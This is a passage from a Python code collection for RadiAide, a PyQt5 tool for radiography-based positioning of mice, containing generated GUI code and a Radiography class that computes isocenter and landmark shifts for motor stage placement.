Mouse_Positioning_Interface.setMenuBar(self.menuBar)
self.actionLoad_Radiography_scatter = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionLoad_Radiography_scatter.setObjectName("actionLoad_Radiography_scatter")
self.action_SaveLogfile = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_SaveLogfile.setObjectName("action_SaveLogfile")
self.action_Exit = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_Exit.setObjectName("action_Exit")
self.actionRestore_Old_Session = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionRestore_Old_Session.setObjectName("actionRestore_Old_Session")
self.action_LogLevel_Info = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_LogLevel_Info.setCheckable(True)
self.action_LogLevel_Info.setObjectName("action_LogLevel_Info")
self.action_LogLevel_Debug = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_LogLevel_Debug.setCheckable(True)
self.action_LogLevel_Debug.setObjectName("action_LogLevel_Debug")
self.action_Log_Serial_Com = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_Log_Serial_Com.setCheckable(True)
self.action_Log_Serial_Com.setObjectName("action_Log_Serial_Com")
self.actionSet_Logfile_Directory = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionSet_Logfile_Directory.setObjectName("actionSet_Logfile_Directory")
self.action_scan_COM_ports = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_scan_COM_ports.setObjectName("action_scan_COM_ports")
self.actionN2V_for_RG = QtWidgets.QAction(Mouse_Positioning_Interface)
self.actionN2V_for_RG.setObjectName("actionN2V_for_RG")
self.action_set_beam_diameter = QtWidgets.QAction(Mouse_Positioning_Interface)
self.action_set_beam_diameter.setObjectName("action_set_beam_diameter")
self.menuActions.addAction(self.action_Exit)
self.menuLog_Level.addAction(self.action_LogLevel_Info)
self.menuLog_Level.addAction(self.action_LogLevel_Debug)
self.menuOptions.addAction(self.menuLog_Level.menuAction())
self.menuOptions.addAction(self.action_Log_Serial_Com)
self.menuOptions.addAction(self.actionSet_Logfile_Directory)
self.menuUtils.addAction(self.action_scan_COM_ports)
self.menuUtils.addAction(self.actionN2V_for_RG)
self.menuUtils.addAction(self.action_set_beam_diameter)
self.menuBar.addAction(self.menuActions.menuAction())
self.menuBar.addAction(self.menuOptions.menuAction())
self.menuBar.addAction(self.menuUtils.menuAction())
self.retranslateUi(Mouse_Positioning_Interface)
self.Registration.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(Mouse_Positioning_Interface)
def retranslateUi(self, Mouse_Positioning_Interface):
_translate = QtCore.QCoreApplication.translate
Mouse_Positioning_Interface.setWindowTitle(_translate("Mouse_Positioning_Interface", "Mouse Positioning Interface"))
self.groupBox.setTitle(_translate("Mouse_Positioning_Interface", "Log"))
self.GroupCoordinates.setTitle(_translate("Mouse_Positioning_Interface", "Workflow"))
self.SS_IC_Label.setText(_translate("Mouse_Positioning_Interface", "IsoCenter"))
self.SS_Plan_Box_2.setText(_translate("Mouse_Positioning_Interface", "Plan\n"
"Image"))
self.LabelCOM_4.setText(_translate("Mouse_Positioning_Interface", "Treatment\n"
"Image"))
self.LabelCOM_5.setText(_translate("Mouse_Positioning_Interface", "Registration\n"
"approved"))
self.LabelCOM_6.setText(_translate("Mouse_Positioning_Interface", "Motor stage\n"
"set"))
self.Button_create_report.setText(_translate("Mouse_Positioning_Interface", "Report"))
self.Group_IsoCenter.setTitle(_translate("Mouse_Positioning_Interface", "IsoCenter"))
self.label_5.setText(_translate("Mouse_Positioning_Interface", "x<sub>Iso</sub>="))
self.Button_Radiograph_toggleIso.setText(_translate("Mouse_Positioning_Interface", "Toggle"))
self.label_6.setText(_translate("Mouse_Positioning_Interface", "y<sub>Iso</sub>="))
self.Button_RG_defineIsoCenter.setText(_translate("Mouse_Positioning_Interface", "Define"))
self.groupBox_3.setTitle(_translate("Mouse_Positioning_Interface", "Landmarks"))
self.Button_RadiographyLM.setText(_translate("Mouse_Positioning_Interface", "Set Landmarks"))
self.Button_toggleLandmarksRG.setText(_translate("Mouse_Positioning_Interface", "Toggle Landmarks"))
self.label_24.setText(_translate("Mouse_Positioning_Interface", "x<sub>Pin</sub>="))
self.label_23.setText(_translate("Mouse_Positioning_Interface", "y<sub>Pin</sub>="))
self.Registration.setTabText(self.Registration.indexOf(self.TabRadiography), _translate("Mouse_Positioning_Interface", "Radiography"))
self.groupBox_20.setTitle(_translate("Mouse_Positioning_Interface", "Overlay"))
self.Button_RunReg.setText(_translate("Mouse_Positioning_Interface", "Run Registration"))
self.Button_AccReg.setText(_translate("Mouse_Positioning_Interface", "Accept Registration"))
self.groupBox_21.setTitle(_translate("Mouse_Positioning_Interface", "Default landmark positions"))
self.Button_default_moving.setText(_translate("Mouse_Positioning_Interface", "Set default positions (moving)"))
item = self.CoordsTable.verticalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 1"))
item = self.CoordsTable.verticalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 2"))
item = self.CoordsTable.verticalHeaderItem(2)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 3"))
item = self.CoordsTable.verticalHeaderItem(3)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 4"))
item = self.CoordsTable.verticalHeaderItem(4)
item.setText(_translate("Mouse_Positioning_Interface", "Marker 5"))
item = self.CoordsTable.horizontalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "Moving"))
item = self.CoordsTable.horizontalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Fixed"))
__sortingEnabled = self.CoordsTable.isSortingEnabled()
self.CoordsTable.setSortingEnabled(False)
item = self.CoordsTable.item(0, 0)
item.setText(_translate("Mouse_Positioning_Interface", "655, 534"))
item = self.CoordsTable.item(0, 1)
item.setText(_translate("Mouse_Positioning_Interface", "655, 534"))
item = self.CoordsTable.item(1, 0)
item.setText(_translate("Mouse_Positioning_Interface", "592, 520"))
item = self.CoordsTable.item(1, 1)
item.setText(_translate("Mouse_Positioning_Interface", "592, 520"))
item = self.CoordsTable.item(2, 0)
item.setText(_translate("Mouse_Positioning_Interface", "494, 540"))
item = self.CoordsTable.item(2, 1)
item.setText(_translate("Mouse_Positioning_Interface", "494, 540"))
item = self.CoordsTable.item(3, 0)
item.setText(_translate("Mouse_Positioning_Interface", "602, 586"))
item = self.CoordsTable.item(3, 1)
item.setText(_translate("Mouse_Positioning_Interface", "602, 586"))
item = self.CoordsTable.item(4, 0)
item.setText(_translate("Mouse_Positioning_Interface", "703, 565"))
item = self.CoordsTable.item(4, 1)
item.setText(_translate("Mouse_Positioning_Interface", "703, 565"))
self.CoordsTable.setSortingEnabled(__sortingEnabled)
self.Button_default_fixed.setText(_translate("Mouse_Positioning_Interface", "Set default positions (fixed)"))
self.groupBox_2.setTitle(_translate("Mouse_Positioning_Interface", "Marker Control"))
self.label.setText(_translate("Mouse_Positioning_Interface", "Plan"))
self.label_3.setText(_translate("Mouse_Positioning_Interface", "Treatment"))
self.groupBox_10.setTitle(_translate("Mouse_Positioning_Interface", "Motor stage origin"))
self.label_13.setText(_translate("Mouse_Positioning_Interface", "x<sub>Table</sub>="))
self.label_57.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_14.setText(_translate("Mouse_Positioning_Interface", "y<sub>Table</sub>="))
self.label_58.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.Group_Result.setTitle(_translate("Mouse_Positioning_Interface", "Calculated table position:"))
self.label_9.setText(_translate("Mouse_Positioning_Interface", "x<sub>Table</sub>="))
self.label_59.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_60.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_10.setText(_translate("Mouse_Positioning_Interface", "y<sub>Table<sub>="))
self.groupBox_22.setTitle(_translate("Mouse_Positioning_Interface", "Transformation Parameters"))
self.Label_Trafo_Params.setText(_translate("Mouse_Positioning_Interface", "Parameters:"))
self.label_15.setText(_translate("Mouse_Positioning_Interface", "Transform: Similarity"))
self.groupBox_24.setTitle(_translate("Mouse_Positioning_Interface", "Motor Coordinates"))
self.label_19.setText(_translate("Mouse_Positioning_Interface", "hor"))
self.label_20.setText(_translate("Mouse_Positioning_Interface", "ver"))
self.Btn_setMotor_Origin.setText(_translate("Mouse_Positioning_Interface", "Set as Motor Origin"))
self.Btn_getCurrentMotor.setText(_translate("Mouse_Positioning_Interface", "Get current motor coordinates"))
self.Btn_Reg_calcTable.setText(_translate("Mouse_Positioning_Interface", "Calculate target table position"))
self.groupBox_23.setTitle(_translate("Mouse_Positioning_Interface", "Target Coordinates"))
item = self.table_TrgCoords.verticalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "Raw"))
item = self.table_TrgCoords.verticalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Transformed"))
item = self.table_TrgCoords.horizontalHeaderItem(0)
item.setText(_translate("Mouse_Positioning_Interface", "x, y"))
item = self.table_TrgCoords.horizontalHeaderItem(1)
item.setText(_translate("Mouse_Positioning_Interface", "Get"))
__sortingEnabled = self.table_TrgCoords.isSortingEnabled()
self.table_TrgCoords.setSortingEnabled(False)
self.table_TrgCoords.setSortingEnabled(__sortingEnabled)
self.Button_flip_layers.setText(_translate("Mouse_Positioning_Interface", "Flip Image"))
self.Button_show_Atlas.setText(_translate("Mouse_Positioning_Interface", "Show Atlas"))
self.groupBox_18.setTitle(_translate("Mouse_Positioning_Interface", "Planing image"))
self.Button_load_moving.setText(_translate("Mouse_Positioning_Interface", "Load Image"))
self.groupBox_19.setTitle(_translate("Mouse_Positioning_Interface", "Treatment Image"))
self.Button_load_fixed.setText(_translate("Mouse_Positioning_Interface", "Load Image"))
self.Registration.setTabText(self.Registration.indexOf(self.tab), _translate("Mouse_Positioning_Interface", "Active Positioning"))
self.groupBox_6.setTitle(_translate("Mouse_Positioning_Interface", "Settings"))
self.LabelCOM.setText(_translate("Mouse_Positioning_Interface", "Disconnected"))
self.LabelREF.setText(_translate("Mouse_Positioning_Interface", "Not Calibrated"))
self.label_2.setText(_translate("Mouse_Positioning_Interface", "Mode"))
self.Label_COMPort.setText(_translate("Mouse_Positioning_Interface", "COM port"))
self.Button_MotorInit.setText(_translate("Mouse_Positioning_Interface", "Connect"))
self.Button_MotorDisconnect.setText(_translate("Mouse_Positioning_Interface", "Disconnect"))
self.LabelINIT.setText(_translate("Mouse_Positioning_Interface", "Not ready"))
self.groupBox_4.setTitle(_translate("Mouse_Positioning_Interface", "Current coordinates"))
self.label_4.setText(_translate("Mouse_Positioning_Interface", "x = "))
self.TablePosX.setText(_translate("Mouse_Positioning_Interface", "0"))
self.label_66.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_64.setText(_translate("Mouse_Positioning_Interface", "y = "))
self.TablePosY.setText(_translate("Mouse_Positioning_Interface", "0"))
self.label_65.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.groupBox_13.setTitle(_translate("Mouse_Positioning_Interface", "Table movement"))
self.Button_MoveTable.setText(_translate("Mouse_Positioning_Interface", "Move"))
self.Button_StopTable.setText(_translate("Mouse_Positioning_Interface", "Stop"))
self.label_69.setText(_translate("Mouse_Positioning_Interface", "y = "))
self.label_70.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.label_67.setText(_translate("Mouse_Positioning_Interface", "x = "))
self.label_68.setText(_translate("Mouse_Positioning_Interface", "mm"))
self.ButtonCopyCoordinates.setText(_translate("Mouse_Positioning_Interface", "Copy Coordinates"))
self.Registration.setTabText(self.Registration.indexOf(self.TabMotor), _translate("Mouse_Positioning_Interface", "Motor Control"))
self.menuActions.setTitle(_translate("Mouse_Positioning_Interface", "File"))
self.menuOptions.setTitle(_translate("Mouse_Positioning_Interface", "Logging"))
self.menuLog_Level.setTitle(_translate("Mouse_Positioning_Interface", "Log Level"))
self.menuUtils.setTitle(_translate("Mouse_Positioning_Interface", "Utils"))
self.actionLoad_Radiography_scatter.setText(_translate("Mouse_Positioning_Interface", "Load Radiography (scatter)"))
self.action_SaveLogfile.setText(_translate("Mouse_Positioning_Interface", "Save Logfile"))
self.action_Exit.setText(_translate("Mouse_Positioning_Interface", "Exit"))
self.actionRestore_Old_Session.setText(_translate("Mouse_Positioning_Interface", "Load Logfile"))
self.action_LogLevel_Info.setText(_translate("Mouse_Positioning_Interface", "Info"))
self.action_LogLevel_Debug.setText(_translate("Mouse_Positioning_Interface", "Debug"))
self.action_Log_Serial_Com.setText(_translate("Mouse_Positioning_Interface", "Log Serial Com"))
self.actionSet_Logfile_Directory.setText(_translate("Mouse_Positioning_Interface", "Set Logfile Directory"))
self.action_scan_COM_ports.setText(_translate("Mouse_Positioning_Interface", "Rescan COM ports"))
self.actionN2V_for_RG.setText(_translate("Mouse_Positioning_Interface", "Noise2Void for Radiography"))
self.action_set_beam_diameter.setText(_translate("Mouse_Positioning_Interface", "Set Beam Diameter"))
from matplotlibwidgetFile import matplotlibWidget
import ressources_rc
``` |
{
"source": "jo-mueller/RadiAide",
"score": 2
} |
#### File: RadiAIDD/Backend/Radiography.py
```python
import logging
import numpy as np
from PyQt5.QtWidgets import QMessageBox as QMessage
from RadiAIDD.Backend.Containers import Crosshair
from RadiAIDD.Backend.Children import IsoCenter_Child as IsoCenter
# from Backend.Children import Landmark_Child as Landmark
class Radiography(object):
def __init__(self, GUI, Checklist):
self.GUI = GUI
self.Checklist = Checklist
try:
# Patient Positioning holds information about positioning
# of patient in CT
self.PatientPosition = []
# Crosshairs (two because two radiography images)
self.Crosshair_Landmark = [Crosshair(), Crosshair()]
self.Crosshair_Target = [Crosshair(), Crosshair()]
# Three isocenter crosshairs for active positioning
self.Crosshair_IsoCenter = [Crosshair(), Crosshair(),
Crosshair(), Crosshair()]
# Flags for visibility SpotTxt_x
self.crosshair = False
self.landmark = False
self.target = False
self.pixelsizeXR = None
self.pixelsizeRG = None
# Image data/Target coordiante containers
# self.Radiography_scatter = Lynx()
# RADIOGRAPHY RELATED Buttons
self.GUI.Button_RG_defineIsoCenter.clicked.connect(self.define_isocenter)
# self.GUI.Button_RadiographyLM.clicked.connect(self.define_landmarks)
# toggle visibility of isocenter crosshair in Radiography
self.GUI.Button_Radiograph_toggleIso.clicked.connect(self.toggleIso)
# toggle visibility of landmark lines in Radiography
self.GUI.Button_toggleLandmarksRG.clicked.connect(self.toggleLM)
logging.info('Radiography class successfully initialized')
except Exception:
logging.error('Radiography class could not be initialized')
def define_isocenter(self):
"start pipeline in open child window within which isocenter is defined"
if self.Checklist.IsoCenter:
# If Landmarks were determined previously:
Hint = QMessage()
Hint.setIcon(QMessage.Information)
Hint.setStandardButtons(QMessage.Ok | QMessage.Cancel)
Hint.setText("Loading new Radiography will remove Isocenter "
"Definition. \n Proceed?")
proceed = Hint.exec_()
if proceed == QMessage.Ok:
[crosshair.wipe for crosshair in self.Crosshair_IsoCenter]
self.GUI.Text_RG_Filename_IsoCenter.setText('')
self.GUI.SpotTxt_x.setText('')
self.GUI.SpotTxt_y.setText('')
self.GUI.Display_Isocenter.canvas.axes.imshow([[0], [0]])
self.GUI.Display_Isocenter.canvas.draw()
self.Checklist.IsoCenter = False
else:
return 0
# set state down just to be sure here
self.GUI.IsoCenterState.flag_down()
self.isocenter_window = IsoCenter(self.GUI, self)
self.isocenter_window.show()
# def define_landmarks(self):
# "start pipeline in open child window within which isocenter is defined"
# if self.Checklist.LandmarkRG:
# # If Landmarks were determined previously:
# Hint = QMessage()
# Hint.setIcon(QMessage.Information)
# Hint.setStandardButtons(QMessage.Ok | QMessage.Cancel)
# Hint.setText("Loading new Radiography will remove "
# "Landmark Definition. \n Proceed?")
# proceed = Hint.exec_()
# if proceed == QMessage.Ok:
# # Remove all Landmark-related values/flags
# [crosshair.wipe for crosshair in self.Crosshair_Landmark]
# self.GUI.Text_RG_Filename_Landmark.setText('')
# self.GUI.TxtRGPinX.setText('')
# self.GUI.TxtRGPinY.setText('')
# self.GUI.TxtRGShiftX.setText('')
# self.GUI.TxtRGShiftY.setText('')
# self.GUI.TxtRG_pxcalc.setText('Pixel Spacing:')
# self.GUI.Display_Radiography.canvas.axes.imshow([[0], [0]])
# self.GUI.Display_Radiography.canvas.draw()
# self.Checklist.LandmarkRG = False
# else:
# return 0
# "start pipeline in child window within which landmarks are defined"
# self.landmark_window = Landmark(self.GUI, self)
# self.landmark_window.show()
def CalcDist(self):
# DEPRECATED?
" Calculate actual shift between target and isocenter"
# if not all values are set: do nothing
if not self.Checklist.ready():
return 0
# TxtRGShiftX
# Get current coordinates of moving tables
x_table = float(self.GUI.TableTxt_x.text())
y_table = float(self.GUI.TableTxt_y.text())
# Get coordinates from repositioning
x_repo = float(self.GUI.LCD_shift_x.value())
y_repo = float(self.GUI.LCD_shift_y.value())
# get coordinates of isocenter (relative to earpin)
x_iso = float(self.GUI.TxtRGShiftX.text())
y_iso = float(self.GUI.TxtRGShiftY.text())
# get coordinates of target (relative to earpin)
x_target = float(self.GUI.TxtXRShiftX.text())
y_target = float(self.GUI.TxtXRShiftY.text())
# Caution: Head first supine and feet first prone positions have
# inverted dorsal-ventral and inferior-superior axes!!!
if self.PatientPosition == 'HFS':
# (-1) because x/y-coordiantes are inverse in table/CT coordinates
target2iso_x = (-1.0)*(x_iso - x_target) + x_table + x_repo
target2iso_y = (-1.0)*(y_iso - y_target) + y_table + y_repo
# Write to text field
self.GUI.TableTxt_xCorr.setText('{:4.2f}'.format(target2iso_x))
self.GUI.TableTxt_yCorr.setText('{:4.2f}'.format(target2iso_y))
elif self.PatientPosition == 'FFP':
target2iso_x = x_table + (x_iso - x_target) + x_repo
target2iso_y = y_table + (y_iso - y_target) + y_repo
# Write to text field
self.GUI.TableTxt_xCorr.setText('{:4.2f}'.format(target2iso_x))
self.GUI.TableTxt_yCorr.setText('{:4.2f}'.format(target2iso_y))
else: # if other positionings were used:
self.GUI.TableTxt_xCorr.setText('Unknown Pat. Positioning')
self.GUI.TableTxt_yCorr.setText('Unknown Pat. Positioning')
return 0
# Highlight result
self.GUI.Group_Result.setStyleSheet(".QGroupBox { border: 2px solid "
"rgb(0,0,255);}")
self.GUI.TableTxt_xCorr.setStyleSheet("color: #b1b1b1; font-weight: bold;")
self.GUI.TableTxt_yCorr.setStyleSheet("color: #b1b1b1; font-weight: bold;")
def return_spacing(self, Spacing):
" Function to be invoked from landmark child to pass spacing values"
# Calculate RG pixel spacing from bed top/bottom coordinates
self.pixelsizeRG = Spacing
# print to field and pass result to Radiography instance
self.GUI.TxtRG_pxcalc.setText('Pixel Spacing: {:4.2f} mm'.format(
self.pixelsizeRG))
self.GUI.TxtRG_pxcalc.setStyleSheet("color: #b1b1b1;")
def return_landmarks(self, Image, xy):
"""Function to be invoked from child
window that serves Landmark definition by earpin"""
# catch returned Image data
self.LandmarkRG = Image
x_lm = xy[0]
y_lm = xy[1]
# Set GUI fields
self.GUI.TxtRGPinX.setText(str(x_lm))
self.GUI.TxtRGPinY.setText(str(y_lm))
self.GUI.TxtRGPinX.setStyleSheet("color: #b1b1b1;")
self.GUI.TxtRGPinY.setStyleSheet("color: #b1b1b1;")
self.GUI.Text_RG_Filename_Landmark.setText(self.LandmarkRG.filename)
# Raise Flag in Checklist
self.Checklist.LandmarkRG = True
# Make image
self.GUI.Display_Radiography.canvas.axes.imshow(self.LandmarkRG.array,
cmap='gray', zorder=1,
origin='lower')
self.GUI.Display_Radiography.canvas.draw()
canvases = [self.GUI.Display_Radiography.canvas,
self.GUI.Display_Isocenter.canvas]
# Prepare crosshairs
for crosshair in tuple(zip(self.Crosshair_Landmark, canvases)):
crosshair[0].setup(crosshair[1], size=5, x=x_lm, y=y_lm,
text='Earpin', zorder=3,
color='red', circle=False)
# If landmark and isocenter are provided,
# calculate spatial shift in RG image
if self.Checklist.IsoCenter and self.Checklist.LandmarkRG:
pixperdistRG = self.pixelsizeRG
# Get local representatives of necessary variables
x_Iso = float(self.GUI.SpotTxt_x.text())
y_Iso = float(self.GUI.SpotTxt_y.text())
x_Pin = float(self.GUI.TxtRGPinX.text())
y_Pin = float(self.GUI.TxtRGPinY.text())
# Calculate shift
dx = pixperdistRG*(x_Iso - x_Pin)
dy = pixperdistRG*(y_Iso - y_Pin)
self.GUI.TxtRGShiftX.setText('{:4.2f}'.format(dx))
self.GUI.TxtRGShiftY.setText('{:4.2f}'.format(dy))
if np.sqrt(dx**2 + dy**2) < 1.0:
self.GUI.TxtRGShiftX.setStyleSheet("color: rgb(0, 255, 0);")
self.GUI.TxtRGShiftY.setStyleSheet("color: rgb(0, 255, 0);")
else:
self.GUI.TxtRGShiftX.setStyleSheet("color: rgb(255, 0, 0);")
self.GUI.TxtRGShiftY.setStyleSheet("color: rgb(255, 0, 0);")
self.CalcDist()
def return_isocenter(self, RadiographyImg, xy):
"""Function to be invoked from child window that passes IsoCenter
coordinates to main window"""
self.IsoCenterImg = RadiographyImg
x_iso = xy[0]
y_iso = xy[1]
self.GUI.SpotTxt_x.setText('{:.3f}'.format(x_iso))
self.GUI.SpotTxt_y.setText('{:.3f}'.format(y_iso))
self.GUI.SpotTxt_x.setStyleSheet("color: #b1b1b1;")
self.GUI.SpotTxt_y.setStyleSheet("color: #b1b1b1;")
# Set checklist entry for IsoCenter True and try calculation
self.Checklist.IsoCenter = True
if self.Checklist.ready():
self.CalcDist()
# Display isocenter image, filename and enable crosshair on this image
self.GUI.Display_Isocenter.canvas.axes.imshow(self.IsoCenterImg.array,
cmap='gray',
zorder=1, origin='lower')
self.GUI.Display_Isocenter.canvas.draw()
self.GUI.Text_RG_Filename_IsoCenter.setText(self.IsoCenterImg.filename)
canvases = [self.GUI.Display_Radiography.canvas,
self.GUI.Display_Isocenter.canvas,
self.GUI.Display_Fixed.canvas,
self.GUI.Display_Fusion.canvas]
# Prepare crosshairs
for crosshair in tuple(zip(self.Crosshair_IsoCenter, canvases)):
crosshair[0].setup(crosshair[1], size=5, x=x_iso, y=y_iso,
text='IsoCenter', zorder=3,
color='blue', circle=True)
# Write this to statesign
self.GUI.IsoCenterState.toggle()
def toggleLM(self):
for crosshair in self.Crosshair_Landmark:
crosshair.toggle()
def toggleIso(self):
for crosshair in self.Crosshair_IsoCenter:
crosshair.toggle()
```
#### File: RadiAIDD/Backend/Target5.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Target(object):
def setupUi(self, Target):
Target.setObjectName("Target")
Target.resize(691, 517)
self.centralwidget = QtWidgets.QWidget(Target)
self.centralwidget.setObjectName("centralwidget")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(10, 10, 661, 461))
self.groupBox.setObjectName("groupBox")
self.Display_XRay = matplotlibWidget(self.groupBox)
self.Display_XRay.setGeometry(QtCore.QRect(100, 50, 400, 400))
self.Display_XRay.setObjectName("Display_XRay")
self.Button_Done = QtWidgets.QPushButton(self.groupBox)
self.Button_Done.setGeometry(QtCore.QRect(540, 400, 111, 31))
self.Button_Done.setObjectName("Button_Done")
self.groupBox_2 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_2.setGeometry(QtCore.QRect(10, 20, 81, 411))
self.groupBox_2.setObjectName("groupBox_2")
self.splitter = QtWidgets.QSplitter(self.groupBox_2)
self.splitter.setGeometry(QtCore.QRect(20, 20, 40, 371))
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.layoutWidget = QtWidgets.QWidget(self.splitter)
self.layoutWidget.setObjectName("layoutWidget")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.layoutWidget)
self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.GreyValue_center = QtWidgets.QSlider(self.layoutWidget)
self.GreyValue_center.setOrientation(QtCore.Qt.Vertical)
self.GreyValue_center.setObjectName("GreyValue_center")
self.horizontalLayout_2.addWidget(self.GreyValue_center)
self.GreyValue_range = QtWidgets.QSlider(self.layoutWidget)
self.GreyValue_range.setOrientation(QtCore.Qt.Vertical)
self.GreyValue_range.setObjectName("GreyValue_range")
self.horizontalLayout_2.addWidget(self.GreyValue_range)
self.layoutWidget_2 = QtWidgets.QWidget(self.splitter)
self.layoutWidget_2.setObjectName("layoutWidget_2")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.layoutWidget_2)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.Label_Scrollbar_center = QtWidgets.QLabel(self.layoutWidget_2)
self.Label_Scrollbar_center.setAutoFillBackground(True)
self.Label_Scrollbar_center.setObjectName("Label_Scrollbar_center")
self.horizontalLayout.addWidget(self.Label_Scrollbar_center)
self.Label_Scrollbar_range = QtWidgets.QLabel(self.layoutWidget_2)
self.Label_Scrollbar_range.setObjectName("Label_Scrollbar_range")
self.horizontalLayout.addWidget(self.Label_Scrollbar_range)
self.Button_setTarget = QtWidgets.QPushButton(self.groupBox)
self.Button_setTarget.setGeometry(QtCore.QRect(540, 30, 111, 31))
self.Button_setTarget.setObjectName("Button_setTarget")
self.Slider_TargetX = QtWidgets.QSlider(self.groupBox)
self.Slider_TargetX.setGeometry(QtCore.QRect(100, 20, 401, 19))
self.Slider_TargetX.setOrientation(QtCore.Qt.Horizontal)
self.Slider_TargetX.setObjectName("Slider_TargetX")
self.Slider_TargetY = QtWidgets.QSlider(self.groupBox)
self.Slider_TargetY.setGeometry(QtCore.QRect(510, 50, 19, 391))
self.Slider_TargetY.setOrientation(QtCore.Qt.Vertical)
self.Slider_TargetY.setInvertedAppearance(True)
self.Slider_TargetY.setObjectName("Slider_TargetY")
self.Button_lockTarget = QtWidgets.QPushButton(self.groupBox)
self.Button_lockTarget.setGeometry(QtCore.QRect(540, 130, 111, 31))
self.Button_lockTarget.setObjectName("Button_lockTarget")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(542, 72, 111, 48))
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.label_5 = QtWidgets.QLabel(self.widget)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 0, 0, 1, 1)
self.TxtTrgtX = QtWidgets.QLineEdit(self.widget)
self.TxtTrgtX.setObjectName("TxtTrgtX")
self.gridLayout.addWidget(self.TxtTrgtX, 0, 1, 1, 1)
self.label_6 = QtWidgets.QLabel(self.widget)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 1, 0, 1, 1)
self.TxtTrgtY = QtWidgets.QLineEdit(self.widget)
self.TxtTrgtY.setObjectName("TxtTrgtY")
self.gridLayout.addWidget(self.TxtTrgtY, 1, 1, 1, 1)
Target.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(Target)
self.menubar.setGeometry(QtCore.QRect(0, 0, 691, 21))
self.menubar.setObjectName("menubar")
Target.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(Target)
self.statusbar.setObjectName("statusbar")
Target.setStatusBar(self.statusbar)
self.retranslateUi(Target)
QtCore.QMetaObject.connectSlotsByName(Target)
def retranslateUi(self, Target):
_translate = QtCore.QCoreApplication.translate
Target.setWindowTitle(_translate("Target", "TargetDefinition"))
self.groupBox.setTitle(_translate("Target", "Target"))
self.Button_Done.setText(_translate("Target", "Done"))
self.groupBox_2.setTitle(_translate("Target", "Gray Window"))
self.Label_Scrollbar_center.setText(_translate("Target", "0"))
self.Label_Scrollbar_range.setText(_translate("Target", "0"))
self.Button_setTarget.setText(_translate("Target", "Set Target"))
self.Button_lockTarget.setText(_translate("Target", "Lock"))
self.label_5.setText(_translate("Target", "x="))
self.label_6.setText(_translate("Target", "y="))
from matplotlibwidgetFile import matplotlibWidget
```
#### File: Backend/UI/Landmark5.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Landmark(object):
def setupUi(self, Landmark):
Landmark.setObjectName("Landmark")
Landmark.resize(787, 539)
self.centralwidget = QtWidgets.QWidget(Landmark)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_2.setObjectName("gridLayout_2")
self.Display_Landmarks = matplotlibWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Landmarks.sizePolicy().hasHeightForWidth())
self.Display_Landmarks.setSizePolicy(sizePolicy)
self.Display_Landmarks.setObjectName("Display_Landmarks")
self.gridLayout_2.addWidget(self.Display_Landmarks, 0, 0, 2, 1)
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setObjectName("groupBox_2")
self.gridLayout = QtWidgets.QGridLayout(self.groupBox_2)
self.gridLayout.setObjectName("gridLayout")
self.Button_LoadLandmark = QtWidgets.QPushButton(self.groupBox_2)
self.Button_LoadLandmark.setObjectName("Button_LoadLandmark")
self.gridLayout.addWidget(self.Button_LoadLandmark, 0, 0, 1, 1)
self.Text_Filename = QtWidgets.QTextBrowser(self.groupBox_2)
self.Text_Filename.setObjectName("Text_Filename")
